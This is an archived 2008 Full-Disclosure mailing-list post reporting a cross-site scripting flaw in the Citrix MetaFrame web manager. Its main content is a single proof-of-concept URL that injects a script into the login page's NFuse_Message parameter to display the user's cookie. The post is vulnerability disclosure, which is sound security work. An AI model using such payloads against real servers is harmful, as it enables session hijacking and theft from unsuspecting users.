[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Citrix MetaFrame web manager remote XSS

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] Citrix MetaFrame web manager remote XSS
From: Handrix <handrix@xxxxxxxxx>
Date: Fri, 22 Feb 2008 16:26:58 +0000

Citrix MetaFrame remote xss
Author: handrix
Contact: handrix_at_morx_dot_org
Vulnerability: Cross Site Scripting
Severity: Medium/High
MorX security research team
www.morx.org



The Citrix MetaFrame web manager are vulnerable to XSS attack.

XSS Vector :
http://server/Citrix/MetaFrameXP/default/login.asp?NFuse_LogoutId=Off&NFuse_MessageType=warning&NFuse_Message=%3Cscript%3Ealert(document.cookie);%3C/script%3E

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] On Topic Off Topic: How To Behave On An Internet Forum
Next by Date: Re: [Full-disclosure] On Topic Off Topic: How To Behave On An Internet Forum
Previous by thread: Re: [Full-disclosure] On Topic Off Topic: How To Behave On An Internet Forum
Next by thread: [Full-disclosure] Multiple vulnerabilities in Double-Take 5.0.0.2865
Index(es):
- Date
- Thread